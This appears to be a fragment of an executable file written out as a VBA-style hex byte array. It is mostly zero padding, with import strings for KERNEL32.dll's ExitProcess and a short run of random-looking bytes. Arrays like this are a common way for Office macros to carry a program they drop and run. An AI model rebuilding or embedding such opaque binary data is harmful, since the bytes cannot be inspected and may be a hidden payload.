&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H2C&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H54&H30&H00&H00&H38&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H30&H00&H00&H00&H00&H00&H00&H9C&H00&H45&H78&H69&H74&H50&H72&H6F&H63&H65&H73&H73&H00&H00&H00&H00&H30&H00&H00&H4B&H45&H52&H4E&H45&H4C&H33&H32&H2E&H64&H6C&H6C&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H14&HC6&H14&H2E&HCB&HCE&H6D&HF2&HB9&H7B&HF5&H8B&H06&HA0&HF1&HCB
